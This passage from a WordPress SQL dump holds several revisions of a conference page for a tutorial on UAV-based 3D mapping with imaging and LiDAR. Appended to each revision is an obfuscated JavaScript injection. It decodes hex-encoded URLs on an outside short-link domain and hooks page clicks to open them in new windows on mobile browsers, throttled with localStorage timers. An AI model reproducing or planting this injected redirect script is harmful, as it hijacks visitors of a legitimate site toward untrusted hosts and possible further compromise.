Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','3701-revision-v1','','','2023-02-02 09:10:04','2023-02-02 09:10:04','',3701,'https://gsw2023.com/?p=3704',0,'revision','',0),
(3705,1,'2023-02-02 09:13:00','2023-02-02 09:13:00','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3702\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Scope</h5>\n<p>&nbsp;</p>\n<h6 style=\"text-align: justify;\"><strong>The continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning) are providing the professional geospatial community with ever-growing opportunities to generate accurate 3D information with rich set of attributes. These advances are also coupled with improvement in the sensors’ performance, reduction in the associated cost, and miniaturization of such sensors. Aside from the sensing systems, we are also enjoying the emerging of promising platforms such as Uncrewed Aerial Vehicles (UAVs). This tutorial will provide an overview of recent activities focusing on UAV-based mapping while highlighting: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping systems.</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"71\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','3701-revision-v1','','','2023-02-02 09:13:00','2023-02-02 09:13:00','',3701,'https://gsw2023.com/?p=3705',0,'revision','',0),
(3706,1,'2023-02-02 09:19:13','2023-02-02 09:19:13','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3702\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Scope</h5>\n<p>&nbsp;</p>\n<h6 style=\"text-align: justify;\"><strong>The continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning) are providing the professional geospatial community with ever-growing opportunities to generate accurate 3D information with rich set of attributes. These advances are also coupled with improvement in the sensors’ performance, reduction in the associated cost, and miniaturization of such sensors. Aside from the sensing systems, we are also enjoying the emerging of promising platforms such as Uncrewed Aerial Vehicles (UAVs). This tutorial will provide an overview of recent activities focusing on UAV-based mapping while highlighting: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping systems.</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2>Instructor</h2>\n<p>Ayman F. Habib</p>\n<p>Thomas A. Page Professor in Civil Engineering</p>\n<p>Lyles School of Civil Engineering, Purdue University, USA[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"71\"][vc_separator color=\"blue\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','3701-revision-v1','','','2023-02-02 09:19:13','2023-02-02 09:19:13','',3701,'https://gsw2023.com/?p=3706',0,'revision','',0),
